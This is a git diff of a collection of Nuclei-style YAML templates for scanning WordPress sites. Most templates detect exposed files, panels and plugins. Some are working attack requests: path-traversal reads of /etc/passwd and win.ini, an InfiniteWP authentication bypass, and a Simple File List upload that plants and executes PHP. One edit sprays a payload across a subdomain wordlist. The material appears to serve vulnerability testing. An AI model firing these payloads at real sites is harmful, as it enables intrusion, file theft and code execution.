+ reference: https://hackerone.com/reports/248693
+ tags: config,git,exposure,wordpress,wp-plugin,wp-theme
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/.git/config"
- "{{BaseURL}}/wp-content/themes/.git/config"
-
matchers-condition: and
matchers:
- type: word
words:
- "[core]"
-
- type: dsl
dsl:
- "!contains(tolower(body), '<html')"
- "!contains(tolower(body), '<body')"
condition: and
-
- type: status
status:
- 200
-
-# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-gotmls-detect-11280.yaml b/poc/wordpress/wordpress-gotmls-detect-11280.yaml
new file mode 100644
index 0000000000..08ee19a727
--- /dev/null
+++ b/poc/wordpress/wordpress-gotmls-detect-11280.yaml
@@ -0,0 +1,30 @@
+id: wordpress-gotmls-detect
+
+info:
+ name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
+ author: vsh00t
+ reference: https://www.exploit-db.com/exploits/50107
+ severity: info
+ tags: wordpress,wp-plugin,gotmls
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "gotmls"
+ part: header
+
+ - type: status
+ status:
+ - 302
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - Location
diff --git a/poc/wordpress/wordpress-gotmls-detect.yaml b/poc/wordpress/wordpress-gotmls-detect.yaml
index bdb31dc526..1dcdacb57e 100644
--- a/poc/wordpress/wordpress-gotmls-detect.yaml
+++ b/poc/wordpress/wordpress-gotmls-detect.yaml
@@ -1,23 +1,37 @@
id: wordpress-gotmls-detect
+
info:
name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
author: vsh00t
reference: https://www.exploit-db.com/exploits/50107
severity: info
tags: wordpress,wp-plugin,gotmls
+
requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini"
+ - payloads:
+ Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
+ attack: sniper
+ threads: 100
+
+ raw:
+ - |
+ GET /wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini HTTP/1.1
+ Host: {{Subdomains}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
matchers-condition: and
matchers:
- type: word
words:
- "gotmls"
part: header
+
- type: status
status:
- 302
+
extractors:
- type: kval
part: header
diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml
index ee0c48ec1c..8053e302c0 100644
--- a/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml
+++ b/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml
@@ -1,4 +1,5 @@
id: wordpress-gtranslate-plugin-listing
+
info:
name: WordPress gtranslate Plugin Directory Listing
author: dhiyaneshDK
@@ -6,11 +7,15 @@ info:
description: Searches for sensitive directories present in the gtranslate wordpress plugin.
reference:
- https://www.exploit-db.com/ghdb/6160
- tags: wordpress,listing,plugin
-requests:
+ metadata:
+ max-request: 1
+ tags: wordpress,listing,plugin,edb
+
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gtranslate/"
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +23,9 @@ requests:
- "Index of"
- "/wp-content/plugins/gtranslate/"
condition: and
+
- type: status
status:
- 200
+
+# digest: 4a0a00473045022100b19a9595e2252729132327e25cd562f7762296af165a38e47a7f8d2631d2660b02202d728cf7059e322c85f0d838de5d938c146647e49025ca20e4d3a42f4f4df6d1:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml
new file mode 100644
index 0000000000..ee0c48ec1c
--- /dev/null
+++ b/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml
@@ -0,0 +1,23 @@
+id: wordpress-gtranslate-plugin-listing
+info:
+ name: WordPress gtranslate Plugin Directory Listing
+ author: dhiyaneshDK
+ severity: info
+ description: Searches for sensitive directories present in the gtranslate wordpress plugin.
+ reference:
+ - https://www.exploit-db.com/ghdb/6160
+ tags: wordpress,listing,plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gtranslate/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/gtranslate/"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml
index c9becc5bbe..c48d37c9e4 100644
--- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml
+++ b/poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml
@@ -1,32 +1,40 @@
id: wordpress-infinitewp-auth-bypass
+
info:
name: WordPress InfiniteWP Client Authentication Bypass
author: princechaddha
severity: critical
- description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner to manage unlimited WordPress sites from their own server.
- reference:
- - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
- - https://wordpress.org/plugins/iwp-client/#developers
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
+ reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
tags: wordpress,auth-bypass,wp-plugin
+
requests:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
+ Connection: close
+
- |
POST / HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
+ ContentLength: 3537
+
+ _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}
- _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}}
redirects: true
+
extractors:
- type: regex
name: username
@@ -35,6 +43,7 @@ requests:
part: body
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
+
- type: regex
name: username
internal: true
@@ -42,18 +51,19 @@ requests:
part: header
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
+
matchers-condition: and
matchers:
- type: word
words:
- "wordpress_logged_in"
part: header
+
- type: word
words:
- "<IWPHEADER>"
+
part: body
- type: status
status:
- - 200
-
-# Enhanced by mp on 2022/03/21
+ - 200
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml
index c48d37c9e4..88121a97b7 100644
--- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml
+++ b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml
@@ -1,40 +1,25 @@
id: wordpress-infinitewp-auth-bypass
-
info:
name: WordPress InfiniteWP Client Authentication Bypass
author: princechaddha
severity: critical
reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
tags: wordpress,auth-bypass,wp-plugin
-
requests:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
- Connection: close
-
- |
POST / HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Connection: close
- Upgrade-Insecure-Requests: 1
- Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
- ContentLength: 3537
_IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}
-
redirects: true
-
extractors:
- type: regex
name: username
@@ -43,7 +28,6 @@ requests:
part: body
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
-
- type: regex
name: username
internal: true
@@ -51,19 +35,16 @@ requests:
part: header
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
-
matchers-condition: and
matchers:
- type: word
words:
- "wordpress_logged_in"
part: header
-
- type: word
words:
- "<IWPHEADER>"
-
part: body
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/wordpress/wordpress-instagram-feed.yaml b/poc/wordpress/wordpress-instagram-feed.yaml
deleted file mode 100644
index e7f47716b4..0000000000
--- a/poc/wordpress/wordpress-instagram-feed.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: wordpress-instagram-feed
-
-info:
- name: Smash Balloon Social Photo Feed Detection
- author: ricardomaia
- severity: info
- reference:
- - https://wordpress.org/plugins/instagram-feed/
- metadata:
- plugin_namespace: instagram-feed
- wpscan: https://wpscan.com/plugin/instagram-feed
- tags: tech,wordpress,wp-plugin,top-100,top-200
-
-requests:
- - method: GET
-
- path:
- - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt"
-
- payloads:
- last_version: helpers/wordpress/plugins/instagram-feed.txt
-
- extractors:
- - type: regex
- part: body
- internal: true
- name: internal_detected_version
- group: 1
- regex:
- - '(?i)Stable.tag:\s?([\w.]+)'
-
- - type: regex
- part: body
- name: detected_version
- group: 1
- regex:
- - '(?i)Stable.tag:\s?([\w.]+)'
-
- matchers-condition: or
- matchers:
- - type: dsl
- name: "outdated_version"
- dsl:
- - compare_versions(internal_detected_version, concat("< ", last_version))
-
- - type: regex
- part: body
- regex:
- - '(?i)Stable.tag:\s?([\w.]+)'
diff --git a/poc/wordpress/wordpress-installer-log-11290.yaml b/poc/wordpress/wordpress-installer-log-11290.yaml
deleted file mode 100644
index 3e84e512d7..0000000000
--- a/poc/wordpress/wordpress-installer-log-11290.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: wordpress-installer-log
-info:
- name: WordPress Installer Log
- author: dwisiswant0
- severity: info
- tags: wordpress,logs
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/installer-log.txt"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG"
- part: body
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-installer-log-11292.yaml b/poc/wordpress/wordpress-installer-log-11292.yaml
new file mode 100644
index 0000000000..80528f9a60
--- /dev/null
+++ b/poc/wordpress/wordpress-installer-log-11292.yaml
@@ -0,0 +1,19 @@
+id: wordpress-installer-log
+info:
+ name: WordPress Installer Log
+ author: dwisiswant0
+ severity: info
+ tags: wordpress,log
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/installer-log.txt"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-lfi(1).yaml b/poc/wordpress/wordpress-lfi(1).yaml
new file mode 100644
index 0000000000..7c45453480
--- /dev/null
+++ b/poc/wordpress/wordpress-lfi(1).yaml
@@ -0,0 +1,25 @@
+id: wordpress-LFI
+
+info:
+ name: wordpress-LFI
+ author: 0x240x23elu
+ severity: High
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
+ - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
+ - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
diff --git a/poc/wordpress/wordpress-lfi.yaml b/poc/wordpress/wordpress-lfi.yaml
new file mode 100644
index 0000000000..aea478a3f7
--- /dev/null
+++ b/poc/wordpress/wordpress-lfi.yaml
@@ -0,0 +1,21 @@
+id: wordpress-LFI
+info:
+ name: wordpress-LFI
+ author: 0x240x23elu
+ severity: High
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
+ - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
+ - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
diff --git a/poc/wordpress/wordpress-login.yaml b/poc/wordpress/wordpress-login.yaml
index 7fecc16e01..0372801292 100644
--- a/poc/wordpress/wordpress-login.yaml
+++ b/poc/wordpress/wordpress-login.yaml
@@ -1,23 +1,13 @@
id: wordpress-login
-
info:
- name: WordPress Login Panel - Detect
+ name: WordPress login
author: its0x08
severity: info
- description: WordPress login panel was detected.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 1
tags: panel,wordpress
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
-
matchers:
- type: word
words:
@@ -26,5 +16,3 @@ http:
- '/wp-login.php?action=lostpassword">Lost your password?</a>'
- '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">'
condition: or
-
-# digest: 4b0a0048304602210086807236a145972b89ecdaa833fe7f59fac5c4d3babd16cb539f81c3c8b6b603022100c24de61f99e5153228b3e5c418c3297c3adf10667ceb11498b4fe452e80528f7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-plugins-detect-11297.yaml b/poc/wordpress/wordpress-plugins-detect-11297.yaml
index e6fcb6dba4..3a1bc93f82 100644
--- a/poc/wordpress/wordpress-plugins-detect-11297.yaml
+++ b/poc/wordpress/wordpress-plugins-detect-11297.yaml
@@ -1,47 +1,22 @@
id: wordpress-plugins-detect
-
info:
name: WordPress Plugins Detection
- author: 0xcrypto, foulenzer
- severity: high
+ author: 0xcrypto
+ severity: info
tags: fuzz,wordpress
-
requests:
- raw:
- |
- GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1
+ GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
- threads: 50
payloads:
- plugin:
- - contact-form-7
- - wordpress-seo
- - elementor
- - woocommerce
- - all-in-one-wp-migration
- - updraftplus
- - all-in-one-seo-pack
- - duplicator
- - essential-addons-for-elementor-lite
- - optinmonster
- - w3-total-cache
- - redux-framework
- - ninja-forms
-
+ pluginSlug: helpers/wordlists/wordpress-plugins.txt
+ threads: 50
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: word
words:
- "== Description =="
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "===\\s(.*)\\s===" # extract the plugin name
- - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-plugins-detect-11298.yaml b/poc/wordpress/wordpress-plugins-detect-11298.yaml
index fb3b30feac..e6fcb6dba4 100644
--- a/poc/wordpress/wordpress-plugins-detect-11298.yaml
+++ b/poc/wordpress/wordpress-plugins-detect-11298.yaml
@@ -1,29 +1,47 @@
id: wordpress-plugins-detect
+
info:
name: WordPress Plugins Detection
- author: 0xcrypto
- severity: info
+ author: 0xcrypto, foulenzer
+ severity: high
tags: fuzz,wordpress
+
requests:
- raw:
- |
- GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
+ GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1
Host: {{Hostname}}
threads: 50
payloads:
- pluginSlug: helpers/wordlists/wordpress-plugins.txt
+ plugin:
+ - contact-form-7
+ - wordpress-seo
+ - elementor
+ - woocommerce
+ - all-in-one-wp-migration
+ - updraftplus
+ - all-in-one-seo-pack
+ - duplicator
+ - essential-addons-for-elementor-lite
+ - optinmonster
+ - w3-total-cache
+ - redux-framework
+ - ninja-forms
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "== Description =="
+
extractors:
- type: regex
part: body
group: 1
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
+ - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml
deleted file mode 100644
index 1bb8c02019..0000000000
--- a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml
+++ /dev/null
@@ -1,68 +0,0 @@
-id: wordpress-rce-simplefilelist
-info:
- name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
- author: princechaddha
- severity: critical
- reference: https://wpscan.com/vulnerability/10192
- tags: wordpress,wp-plugin,rce
-requests:
- - raw:
- - |
- POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Connection: close
- Content-Length: 693
- Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
-
- --6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="eeSFL_ID"
-
- 1
- --6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="eeSFL_FileUploadDir"
-
- /wp-content/uploads/simple-file-list/
- --6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="eeSFL_Timestamp"
-
- 1587258885
- --6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="eeSFL_Token"
-
- ba288252629a5399759b6fde1e205bc2
- --6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="file"; filename="nuclei.png"
- Content-Type: image/png
-
- <?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
- --6985fa39c0698d07f6d418b37388e1b2--
- - |
- POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
- Host: {{Hostname}}
- User-Agent: python-requests/2.25.1
- Accept: */*
- Connection: close
- X-Requested-With: XMLHttpRequest
- Content-Length: 81
- Content-Type: application/x-www-form-urlencoded
-
- eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
- - |
- GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Connection: close
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
- part: body
- - type: word
- words:
- - 'text/html'
- part: header
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11301.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11301.yaml
index 804afc6b74..97cf72c41f 100644
--- a/poc/wordpress/wordpress-rce-simplefilelist-11301.yaml
+++ b/poc/wordpress/wordpress-rce-simplefilelist-11301.yaml
@@ -1,20 +1,23 @@
id: wordpress-rce-simplefilelist
info:
- name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
+ name: WordPress SimpleFilelist - Remote Code Execution
author: princechaddha
severity: critical
- reference: https://wpscan.com/vulnerability/10192
description: |
- The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
- tags: wordpress,wp-plugin,rce
+ Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
+ reference:
+ - https://wpscan.com/vulnerability/10192
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: wordpress,wp-plugin,rce,intrusive,upload,python
requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
- Connection: close
- Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
@@ -42,11 +45,8 @@ requests:
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
- User-Agent: python-requests/2.25.1
- Accept: */*
- Connection: close
X-Requested-With: XMLHttpRequest
- Content-Length: 81
+ Accept: */*
Content-Type: application/x-www-form-urlencoded
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
@@ -54,7 +54,6 @@ requests:
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
- Connection: close
matchers-condition: and
matchers:
- type: word
@@ -71,3 +70,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11303.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11303.yaml
new file mode 100644
index 0000000000..804afc6b74
--- /dev/null
+++ b/poc/wordpress/wordpress-rce-simplefilelist-11303.yaml
@@ -0,0 +1,73 @@
+id: wordpress-rce-simplefilelist
+info:
+ name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
+ author: princechaddha
+ severity: critical
+ reference: https://wpscan.com/vulnerability/10192
+ description: |
+ The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
+ tags: wordpress,wp-plugin,rce
+requests:
+ - raw:
+ - |
+ POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Connection: close
+ Content-Length: 693
+ Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
+
+ --6985fa39c0698d07f6d418b37388e1b2
+ Content-Disposition: form-data; name="eeSFL_ID"
+
+ 1
+ --6985fa39c0698d07f6d418b37388e1b2
+ Content-Disposition: form-data; name="eeSFL_FileUploadDir"
+
+ /wp-content/uploads/simple-file-list/
+ --6985fa39c0698d07f6d418b37388e1b2
+ Content-Disposition: form-data; name="eeSFL_Timestamp"
+
+ 1587258885
+ --6985fa39c0698d07f6d418b37388e1b2
+ Content-Disposition: form-data; name="eeSFL_Token"
+
+ ba288252629a5399759b6fde1e205bc2
+ --6985fa39c0698d07f6d418b37388e1b2
+ Content-Disposition: form-data; name="file"; filename="nuclei.png"
+ Content-Type: image/png
+
+ <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
+ --6985fa39c0698d07f6d418b37388e1b2--
+ - |
+ POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.25.1
+ Accept: */*
+ Connection: close
+ X-Requested-With: XMLHttpRequest
+ Content-Length: 81
+ Content-Type: application/x-www-form-urlencoded
+
+ eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
+ - |
+ GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
+ - "PHP Version"
+ - "Configuration Command"
+ part: body
+ condition: and
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-rce-simplefilelist.yaml b/poc/wordpress/wordpress-rce-simplefilelist.yaml
index 1628c63cf5..1bb8c02019 100644
--- a/poc/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/poc/wordpress/wordpress-rce-simplefilelist.yaml
@@ -1,29 +1,18 @@
id: wordpress-rce-simplefilelist
-
info:
- name: WordPress SimpleFilelist - Remote Code Execution
+ name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
author: princechaddha
severity: critical
- description: |
- Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
- reference:
- - https://wpscan.com/vulnerability/10192
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cwe-id: CWE-77
- metadata:
- max-request: 3
- tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
-variables:
- filepath: '{{rand_base(7, "abcdefghi")}}'
-
-http:
+ reference: https://wpscan.com/vulnerability/10192
+ tags: wordpress,wp-plugin,rce
+requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
+ Connection: close
+ Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
@@ -43,35 +32,37 @@ http:
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
- Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
+ Content-Disposition: form-data; name="file"; filename="nuclei.png"
Content-Type: image/png
- <?php echo md5("wordpress-rce-simplefilelist"); phpinfo(); ?>
+ <?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
- X-Requested-With: XMLHttpRequest
+ User-Agent: python-requests/2.25.1
Accept: */*
+ Connection: close
+ X-Requested-With: XMLHttpRequest
+ Content-Length: 81
Content-Type: application/x-www-form-urlencoded
- eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php
+ eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
- |
